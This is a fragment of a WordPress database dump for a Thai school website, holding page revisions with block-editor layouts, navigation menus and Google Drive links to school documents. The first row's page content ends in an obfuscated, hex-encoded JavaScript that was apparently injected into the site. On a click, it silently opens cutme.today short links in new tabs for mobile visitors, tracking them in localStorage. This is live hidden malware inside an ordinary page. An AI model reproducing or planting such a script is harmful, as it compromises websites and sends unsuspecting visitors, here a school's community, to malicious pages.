_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:21:37','2024-08-29 07:21:37','',19,'http://watprato.ssk.in.th/?p=267',0,'revision','',0),
(268,2,'2024-08-29 14:24:01','2024-08-29 07:24:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" 